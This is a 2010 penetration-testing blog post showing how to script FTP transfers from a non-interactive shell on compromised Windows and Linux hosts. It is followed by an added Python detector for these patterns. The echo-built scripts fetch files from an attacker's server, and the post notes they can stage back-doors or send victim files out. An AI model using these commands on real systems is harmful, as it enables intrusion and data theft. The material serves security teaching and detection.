Sunday, 28 November 2010

FTP transfers from within a non-interactive shell (Windows and Linux)

This post covers how an attacker can perform FTP file transfers from within a non-interactive shell (for both Windows and Linux target systems).

Please use this information for legitimate penetration testing purposes only.

When a system is compromised by an attacker, it is common to try to initiate a command shell so that the system can be remotely controlled: commands issued, and files uploaded or downloaded.

However, basic non-interactive shells to compromised systems can be rather tricky to use, because it is so easy to make a mistake and run an interactive program, and then lose control of your shell (and connectivity to the compromised host).

This is why I generally prefer to get an SSH or Metasploit Meterpreter session going once I have initially compromised a system. Before an attacker could do this, however, they would need to upload or download files from the system, perhaps using FTP, TFTP, SSH or HTTP. Here we look specifically at FTP.

The interactive nature of the FTP console

As the FTP program provides an interactive prompt, it is not straightforward to use it in a non-interactive shell. Once you start the FTP command, the FTP console will be stuck waiting for input it can never get.

So how can you use FTP in a non-interactive shell?

In these examples our attacking system (192.168.1.64) has an FTP server running, hosting our malicious files (in this case, test.txt).

FTP in a non-interactive shell to a Windows system

For a Windows system, this is relatively easy because the Windows version of FTP supports the "-s" option.

This enables an attacker to create a script of FTP commands, and then run that script on the remote system.

The script containing the FTP commands can be put on the remote system by echoing commands to a new file on the system using the shell. This sounds complicated but is literally a question of pasting something like the following blob of commands into the shell:

echo open 192.168.1.64 21> ftp.txt
echo anonymous>> ftp.txt
echo ftp@ftp.com>> ftp.txt
echo bin >> ftp.txt
echo get test.txt >> ftp.txt
echo bye >> ftp.txt

This script file can then be checked with the following command. Each line above has created a line in the script file on the remote system.

type ftp.txt

open 192.168.1.64 21
anonymous
ftp@ftp.com
bin
get test.txt
bye


This can then be executed on the remote system, like this:

ftp -s:ftp.txt

This works well and is quick and easy in a Windows shell; however, the task is slightly more complex on a Linux system.


FTP in a non-interactive shell to a Linux system

Normally the FTP command shell on Linux does not have the "-s" option, so we will need to build a shell script to execute the FTP commands. Something like this will work.

echo "#!/bin/sh" >> ftp3.sh
echo "HOST='192.168.1.64'" >> ftp3.sh
echo "USER='anonymous'" >> ftp3.sh
echo "PASSWD='blah@blah.com'" >> ftp3.sh
echo "FILE='test.txt'" >> ftp3.sh
echo "" >> ftp3.sh
echo "ftp -n \$HOST <<BLAH " >> ftp3.sh
echo "quote USER \$USER" >> ftp3.sh
echo "quote PASS \$PASSWD" >> ftp3.sh
echo "bin" >> ftp3.sh
echo "get \$FILE" >> ftp3.sh
echo "quit" >> ftp3.sh
echo "BLAH" >> ftp3.sh
echo "exit 0" >> ftp3.sh

When pasted into a non-interactive shell, the above commands will produce a script file, "ftp3.sh", on the remote victim:

#!/bin/sh
HOST='192.168.1.64'
USER='anonymous'
PASSWD='blah@blah.com'
FILE='test.txt'

ftp -n $HOST <<BLAH
quote USER $USER
quote PASS $PASSWD
bin
get $FILE
quit
BLAH
exit 0


To check and run this script, simply execute the following commands:

cat ftp3.sh
chmod 777 ftp3.sh
./ftp3.sh

...and this will use FTP to download our test file to the target system.


Using this technique it would be relatively easy to put additional files on the victim system, such as connectivity tools, privilege-escalation exploits and back-doors, and also to copy files from the victim system using the same method (with a put rather than a get).

Adding the "echo"s to your own scripts

So, say you have some commands you want to put onto the remote system as a script. It would be a bit of a pain to manually add all those "echo"s to each line, so here is an easy way to add the prepended "echo", and the appended ">> file.txt" to each line.

cat ftp2.sh | sed 's/^/echo "/' | sed 's/$/" >> ftp3.sh/' | sed 's/\$/\\\$/g' > ftpecho.txt

(This command would be used on the attacking system, to prepare the blob of echo commands you want to paste into the non-interactive shell. It also helps protect the $ character which was used in the Linux script above for shell-script variables).
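Seen from the defending side, both variants leave the same trail in command-line or shell-audit logs: a run of echo redirects into one file, followed by "ftp -s:" on that file (Windows) or execution of that file (Linux). The Python detector below is an added example, not part of the original post; the rule names, the min_echo threshold, the log shape (one ordered list of command lines per session) and the sample sessions are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# echo ... > file / echo ... >> file (same syntax in cmd.exe and sh)
ECHO_REDIR = re.compile(r'^\s*echo\b(.*?)>{1,2}\s*(\S+)\s*$', re.I)
# Windows ftp.exe script mode: ftp -s:<file>
FTP_SCRIPT = re.compile(r'\bftp(?:\.exe)?\s.*?-s:(\S+)', re.I)
# Direct execution of a script file: ./file, sh file, bash file
RUN_FILE = re.compile(r'^\s*(?:(?:ba)?sh\s+|\./)(\S+)')
FTP_NOAUTO = re.compile(r'\bftp\s+-\w*n')  # auto-login off, as the here-document form needs

def norm(path):
    """Drop a leading ./ and lower-case (exact on Windows, approximate on Linux)."""
    return (path[2:] if path.startswith("./") else path).lower()

def detect(commands, min_echo=3):
    """Scan one session's ordered command lines; return (rule, file) findings."""
    built = defaultdict(list)   # file -> text echoed into it so far
    findings = []
    for cmd in commands:
        m = ECHO_REDIR.match(cmd)
        if m:
            built[norm(m.group(2))].append(m.group(1))
            continue
        m = FTP_SCRIPT.search(cmd)
        if m:
            name = norm(m.group(1))
            echoed = len(built.get(name, [])) >= min_echo
            findings.append(("ftp-script-echo-built" if echoed else "ftp-script", name))
            continue
        m = RUN_FILE.match(cmd)
        if m:
            name = norm(m.group(1))
            lines = built.get(name, [])
            if len(lines) >= min_echo and any(FTP_NOAUTO.search(l) for l in lines):
                findings.append(("echo-built-ftp-heredoc-run", name))
    return findings

# Constructed sessions: the first two replay commands shown in this post.
WINDOWS = ["echo open 192.168.1.64 21> ftp.txt", "echo anonymous>> ftp.txt",
           "echo get test.txt >> ftp.txt", "echo bye >> ftp.txt",
           "type ftp.txt", "ftp -s:ftp.txt"]
LINUX = [r'echo "#!/bin/sh" >> ftp3.sh', r'echo "ftp -n \$HOST <<BLAH " >> ftp3.sh',
         r'echo "get \$FILE" >> ftp3.sh', r'echo "BLAH" >> ftp3.sh',
         "chmod 777 ftp3.sh", "./ftp3.sh"]
BENIGN = ["echo build started > build.log", "ftp -s:nightly_upload.txt", "./deploy.sh"]
if __name__ == "__main__":
    for label, session in (("windows", WINDOWS), ("linux", LINUX), ("benign", BENIGN)):
        print(label, detect(session))
```

A plain "ftp -s:" with no preceding echo run is still reported, under the lower-confidence "ftp-script" rule, because scheduled jobs use it legitimately; the echo-built variants are the ones worth alerting on.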
